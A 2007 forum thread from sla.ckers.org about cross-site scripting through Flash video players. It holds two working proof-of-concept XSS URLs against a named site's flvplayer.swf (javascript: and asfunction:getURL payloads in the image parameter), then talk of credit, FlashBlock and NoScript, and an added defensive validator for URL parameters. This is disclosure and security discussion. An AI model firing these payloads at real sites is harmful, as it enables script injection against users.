Sla.ckers.org
XSS using Flash
Posted by: 3ric
Date: June 29, 2007 08:07AM

Just one example XSS with Flash video players: http://www.zoominfo.com/About/m/video/flvplayer.swf?file=http://www.zoominfo.com/About/m/video/russ_demo2007.flv&image=javascript:alert(document.domain);//.jpg

I love Flash for its obscureness =)

Re: XSS using Flash
Posted by: thornmaker
Date: June 29, 2007 08:44AM

nice find... what bothers me is that the XSS still fires even though I have flashblock (v. 1.5.3.1) installed... i guess it only blocks the visual display of the flash until i click on it, not the execution of the flash code... ggrrr...

Re: XSS using Flash
Posted by: WhiteAcid
Date: June 29, 2007 08:57AM

Indeed, I thought flashblock would block that :O

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: XSS using Flash
Posted by: 3ric
Date: June 29, 2007 09:30AM

Interestingly enough, it doesn't seem to work with Safari 3 (Win and MacOS) or IE 7, but it does with Opera and Firefox.

Correction: Works in Safari when using Flash's asfunction. Thanks to Wisec for pointing that out (see below): http://www.zoominfo.com/About/m/video/flvplayer.swf?file=http://www.zoominfo.com/About/m/video/russ_demo2007.flv&image=asfunction:getURL,javascript:alert(document.domain);//.jpg

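For the defender's side of the two payloads above, here is an added example that is not code from the thread or from the zoominfo player: a check for URL-valued flashvars such as the player's `image` parameter, written in JavaScript as a stand-in for the ActionScript the SWF would need before handing the value to getURL. The allowlisted host, the helper names and the relative-path rule are assumptions; the test values are the thread's own `image=` payloads.

```javascript
// Added example: scheme-based validation of a URL-valued flashvar.
// Hypothetical helper names; the allowlisted host is an assumption.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// The kind of check the thread's payloads defeat: a trailing "//.jpg"
// makes "javascript:alert(...);//.jpg" look like an image filename.
function naiveExtensionCheck(value) {
  return /\.(jpe?g|png|gif)$/i.test(value);
}

// Hardened check: decide on the scheme and host, never on the suffix.
function isSafeMediaUrl(value, allowedHosts) {
  // Drop control characters and spaces that a lenient URL handler might
  // skip, so "java\tscript:" cannot slip past the scheme match below.
  const cleaned = value.replace(/[\u0000-\u0020]/g, "");
  const schemeMatch = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (!schemeMatch) {
    // No scheme: accept a same-origin relative path, but reject
    // protocol-relative "//host/..." which would change origin.
    return !/^[\\/]{2}/.test(cleaned);
  }
  const scheme = schemeMatch[1].toLowerCase() + ":";
  // Rejects javascript:, asfunction:, data:, vbscript: and anything else.
  if (!ALLOWED_SCHEMES.has(scheme)) return false;
  let url;
  try {
    url = new URL(cleaned);
  } catch (e) {
    return false;
  }
  // Compare the parsed hostname, so "http://good@evil/" is not fooled by userinfo.
  return allowedHosts.includes(url.hostname.toLowerCase());
}

// Inspect a player query string and return the names of unsafe URL parameters.
function unsafeFlashvars(query, allowedHosts) {
  const params = new URLSearchParams(query);
  return ["file", "image"].filter(
    (k) => params.has(k) && !isSafeMediaUrl(params.get(k), allowedHosts)
  );
}
```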

Re: XSS using Flash
Posted by: ascii
Date: June 29, 2007 10:01AM

just to give credits when a technique is new, this XSS stuff (on Flash videos) has been discovered by Stefano di Paola at OWASP Milan

thanks 3ric for making people aware of these techniques by giving some examples : )

---
ascii
ush.it


Re: XSS using Flash
Posted by: 3ric
Date: June 29, 2007 10:46AM

> just to give credits when a technique is new, this
> XSS stuff (on Flash videos) has been discovered by
> Stefano di Paola at OWASP Milan

Of course, sorry for forgetting to mention that. Stefano's research on Flash security is a must-read for all web security researchers. You can find his OWASP slides at his page http://www.wisec.it/sectou.php?id=464dd35c8c5ad

Nonetheless, there has to be more research on that topic, since Flash insecurity is a really big threat.

Re: XSS using Flash
Posted by: ma1
Date: June 29, 2007 11:39AM

thornmaker Wrote:
-------------------------------------------------------
> nice find... what bothers me is that the XSS still
> fires even though I have flashblock (v. 1.5.3.1)
> installed... i guess it only blocks the visual
> display of the flash until i click on it, not the
> execution of the flash code... ggrrr...

That's exactly what it does.
On the other hand, it's been honestly designed and advertised as an annoyance blocker, not as a security tool.
But on the 3rd hand ;) I'm quite surprised that you still use FlashBlock, while you can effectively (as in "don't load/don't run") block Flash and other plugins with NoScript :p

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: XSS using Flash
Date: July 01, 2007 06:27PM

ma1 Wrote:
-------------------------------------------------------
> That's exactly what it does.
> On the other hand, it's been honestly designed and
> advertised as an annoyance blocker, not as a
> security tool.
> But on the 3rd hand ;) I'm quite surprised that
> you still use FlashBlock, while you can
> effectively (as in "don't load/don't run") block
> Flash and other plugins with NoScript :p

I was happy that NoScript does that. That day I uninstalled FlashBlock, and now Flash content is blocked and it's effortless to enable it if I want. =oD
